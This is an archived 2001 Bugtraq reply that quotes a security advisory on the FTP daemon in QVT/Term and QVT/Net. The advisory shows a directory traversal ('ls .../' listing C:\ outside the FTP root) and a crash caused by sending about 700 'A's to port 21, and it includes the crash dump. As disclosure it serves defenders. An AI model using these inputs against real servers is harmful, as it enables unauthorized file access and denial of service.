Re: Vulnerabilities in QVT/Term

From: 3APA3A (3APA3Aat_private)
Date: Thu Sep 27 2001 - 06:17:40 PDT

Next message: Christian Kahlo: "Intershop 4 is vulnerable to a directory traversal (By Maarten Va n Horenbeeck)"

Previous message: Job de Haas: "Re: Websphere cookie/sessionid predictable"
In reply to: joetestaat_private: "Vulnerabilities in QVT/Term"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Hello joetesta,

This  vulnerability was reported to bugtraq on April, 14 for
both  QVT/Term  and QVT/Net 4.3 and 5.0 by SNS (Strumpf Noir
Society) Research.

--Wednesday, September 26, 2001, 8:13:17 AM, you wrote to bugtraqat_private:

jhc> -----BEGIN PGP SIGNED MESSAGE-----

jhc> Vulnerabilities in QVT/Term




jhc>     Overview

jhc> QVT/Term v5.0 is a suite of Internet tools available from http://www.qpc.com/.  Two
jhc> vulnerabilities exist in the FTP daemon.  The first allows a remote user to list the files
jhc> outside the ftp root.  The second allows a remote user to crash the server.




jhc>     Details

jhc> The following excerpt demonstrates the file listing problem; an ftp root of 'C:\root\root\'
jhc> was used:


>> ftp localhost
jhc> Connected to xxxxxxxxx.rh.rit.edu.
jhc> 220 xxxxxxxxx FTP server (QVT/Net 4.3) ready.
jhc> User (xxxxxxxxx.rh.rit.edu:(none)): anonymous
jhc> 331 Guest login OK, please send real ident as password.
jhc> Password:
jhc> 230 Guest login OK, access restrictions apply.
ftp>> ls ../
jhc> 200 PORT command successful.
jhc> 150 Opened data connection for 'ls' (xxxxxxxxx,1048) (0 bytes).
jhc> root
jhc> 226 Transfer complete.
jhc> ftp: 6 bytes received in 0.05Seconds 0.12Kbytes/sec.
ftp>> ls .../
jhc>      [file listing of C:\ is shown here]
jhc> 226 Transfer complete.
jhc> ftp: 1192 bytes received in 0.11Seconds 10.84Kbytes/sec.
ftp>>



jhc> The following is the crash dump that results when a remote user connects to port 21 and
jhc> sends a long stream of 'A's (~700+):



jhc> FTPD caused an invalid page fault in
jhc> module FTPD.EXE at 017f:00404b34.
jhc> Registers:
jhc> EAX=0000200a CS=017f EIP=00404b34 EFLGS=00010213
jhc> EBX=0066799b SS=0187 ESP=0064fac8 EBP=00666a58
jhc> ECX=0000066c DS=0187 ESI=00667ff3 FS=1bb7
jhc> EDX=006699a5 ES=0187 EDI=00669ffd GS=0000
jhc> Bytes at CS:EIP:
jhc> f3 a5 8b c8 68 70 fc 40 00 83 e1 03 53 f3 a4 8b
jhc> Stack dump:
jhc> 00000004 00771b90 00666a58 0064fbc0
jhc> 0000060a 12948ae8 00771b90 004105a0
jhc> 00288b30 bff728a2 0187bff7 bff713e2
jhc> 12948b04 0a2c175f 12990002 00288b4c




jhc>     Solution

jhc> No quick fix is possible.




jhc>     Vendor Status

jhc> QPC Software was contacted via <supportat_private> on Tuesday, September 18, 2001.  No reply
jhc> was received.






jhc>     - Joe Testa

jhc> e-mail:   joetestaat_private
jhc> web page: http://hogs.rit.edu/~joet/
jhc> AIM:      LordSpankatron


jhc> -----BEGIN PGP SIGNATURE-----
jhc> Version: Hush 2.0

jhc> wl0EARECAB0FAjuxgKkWHGpvZXRlc3RhQGh1c2htYWlsLmNvbQAKCRA/wHT6vruBNAPK
jhc> AJ9wTSs45AV9UKruT/Hikdomqu0IWgCfbDSqFhwDBqLJYqKimvXMV20hPmc=
jhc> =xAvj
jhc> -----END PGP SIGNATURE-----


-- 
~/3APA3A
Почтенные ископаемые! Жду от вас дальнейших писем.  (Твен)

Next message: Christian Kahlo: "Intershop 4 is vulnerable to a directory traversal (By Maarten Va n Horenbeeck)"
Previous message: Job de Haas: "Re: Websphere cookie/sessionid predictable"
In reply to: joetestaat_private: "Vulnerabilities in QVT/Term"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Thu Sep 27 2001 - 14:56:14 PDT